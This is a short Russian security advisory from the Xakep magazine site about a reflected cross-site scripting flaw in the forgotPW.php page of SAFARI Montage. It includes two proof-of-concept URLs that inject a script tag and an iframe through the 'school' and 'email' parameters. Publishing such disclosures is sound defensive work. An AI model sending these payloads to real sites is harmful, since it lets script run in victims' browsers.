Межсайтовый скриптинг в SAFARI Montage

Рекомендуем почитать:

Xakep #288. Неправильные эльфы

Содержание выпуска
Подписка на «Хакер»-60%

Программа: SAFARI Montage 0

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных сценарием forgotPW.php. Атакующий может выполнить произвольный сценарий в
браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

http://www.example.com/SAFARI/montage/ forgotPW.php?school="><script> alert(1)</script>

http://www.example.com/SAFARI/montage/ forgotPW.php?email="><iframe src="http://www.example2.com">

Межсайтовый скриптинг в SAFARI Montage

Xakep #288. Неправильные эльфы

Последние взломы

Фундаментальные основы хакерства. Осваиваем разные способы поиска защит в программах для x86-64

HTB Precious. Эксплуатируем простую RCE в приложении на Ruby

KARMAгеддон. Атакуем клиентские устройства с помощью Karma

Идеальный пентест. Как довести заказчика до экстаза

Компьютерные трюки

VPN для друзей. Разворачиваем свой VPN-сервер с оплатой через Telegram

Запретный апгрейд. Взламываем UEFI ноутбука Lenovo, чтобы поменять адаптер Wi-Fi

Мастерская хакера. ИИ-помощники, работа с JSON и приятные мелочи, которые пригодятся в работе

Крококряк. Снимаем трафик с витой пары обычными «крокодилами»

Свежие новости

DeFi-проект Fintoch исчез вместе с 31,6 млн долларов клиентов

Zyxel патчит критические уязвимости в своих брандмауэрах и VPN

Мошенники звонят родственникам жертв, чтобы добраться до семейного бюджета

Ботнет Dark Frost нацелен на игровую индустрию

Исследователи показали взлом аппаратного кошелька Trezor T